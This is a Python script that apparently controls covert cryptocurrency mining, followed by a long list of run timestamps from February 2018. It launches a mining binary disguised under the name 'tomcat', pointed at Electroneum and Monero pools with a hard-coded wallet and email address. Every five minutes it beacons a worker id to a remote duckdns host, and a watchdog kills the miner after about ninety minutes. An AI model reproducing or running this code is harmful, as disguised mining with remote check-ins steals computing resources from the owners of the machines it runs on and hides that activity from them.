import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:40:07.822371
#2018-02-17 17:29:05.542211
#2018-02-17 19:18:07.188829
#2018-02-17 21:09:01.640989
#2018-02-17 22:52:06.354197
#2018-02-18 00:37:07.086790
#2018-02-18 02:28:04.072104
#2018-02-18 04:15:05.359057
#2018-02-18 06:08:06.360393
#2018-02-18 07:59:01.862902
#2018-02-18 09:47:01.226027
#2018-02-18 11:34:01.744693
#2018-02-18 13:19:07.089413
#2018-02-18 15:09:03.825198
#2018-02-18 16:57:03.608168
#2018-02-18 18:44:04.343090
#2018-02-18 20:32:03.861118
#2018-02-18 22:18:03.802830
#2018-02-19 00:07:05.921231
#2018-02-19 01:53:06.490129
#2018-02-19 03:40:07.034111
#2018-02-19 05:24:06.127402
#2018-02-19 07:13:06.373682
#2018-02-19 09:03:07.618286
#2018-02-19 10:52:07.834571
#2018-02-19 12:41:01.575074
#2018-02-19 14:28:07.384485
#2018-02-19 16:18:01.376457
#2018-02-19 18:05:01.718580
#2018-02-19 19:53:06.592742
#2018-02-19 21:42:01.742571
#2018-02-19 23:28:06.807916
#2018-02-20 01:13:06.226678
#2018-02-20 03:03:02.072868
#2018-02-20 04:49:05.902681
#2018-02-20 06:33:06.785653
#2018-02-20 08:18:01.577058
#2018-02-20 10:03:05.336070
#2018-02-20 11:47:07.540377
#2018-02-20 13:35:02.862168
#2018-02-20 15:18:09.978023
#2018-02-20 17:05:06.012199
#2018-02-20 18:54:06.655430
#2018-02-20 20:44:05.555250
#2018-02-20 22:29:06.850047
#2018-02-21 00:10:05.355772
#2018-02-21 01:57:07.314590
#2018-02-21 03:45:10.007879
#2018-02-21 05:30:09.780962
#2018-02-21 07:19:01.929415
#2018-02-21 09:04:06.217804
#2018-02-21 10:52:04.660346
#2018-02-21 12:39:09.630978
#2018-02-21 14:28:06.677166
#2018-02-21 16:16:04.715679
#2018-02-21 18:07:01.384199
#2018-02-21 19:53:05.568960
#2018-02-21 21:40:01.476418
#2018-02-21 23:27:07.966852
#2018-02-22 01:15:08.126619
#2018-02-22 03:06:06.669777
#2018-02-22 04:50:01.491902
#2018-02-22 06:35:03.127830
#2018-02-22 08:23:02.172974
#2018-02-22 10:11:02.083429
#2018-02-22 11:57:06.621043
#2018-02-22 13:42:01.783965
#2018-02-22 15:31:01.964722
#2018-02-22 17:17:09.715804
#2018-02-22 19:06:02.236350
#2018-02-22 20:58:01.781192
#2018-02-22 22:45:08.545702
#2018-02-23 00:33:07.665087
#2018-02-23 02:19:07.460694
#2018-02-23 04:09:04.203646
#2018-02-23 05:51:03.954523
#2018-02-23 07:41:06.320987
#2018-02-23 09:46:05.574048
#2018-02-23 11:52:08.504949
#2018-02-23 13:41:03.825818
#2018-02-23 15:29:07.785128
#2018-02-23 17:19:04.452163
#2018-02-23 19:05:08.721685
#2018-02-23 20:51:07.015997
#2018-02-23 22:36:07.451420
#2018-02-24 00:23:01.981879
#2018-02-24 02:14:06.251374
#2018-02-24 04:04:05.956343
#2018-02-24 06:42:06.703008
#2018-02-24 08:31:01.584564
#2018-02-24 10:18:02.130655
#2018-02-24 12:14:04.066533
#2018-02-24 14:02:06.534881
#2018-02-24 15:52:04.601902
#2018-02-24 17:45:09.355085
#2018-02-24 19:31:05.987918
#2018-02-24 21:19:06.311300
#2018-02-24 23:58:04.174639
#2018-02-25 04:19:06.079740
#2018-02-25 07:49:06.846040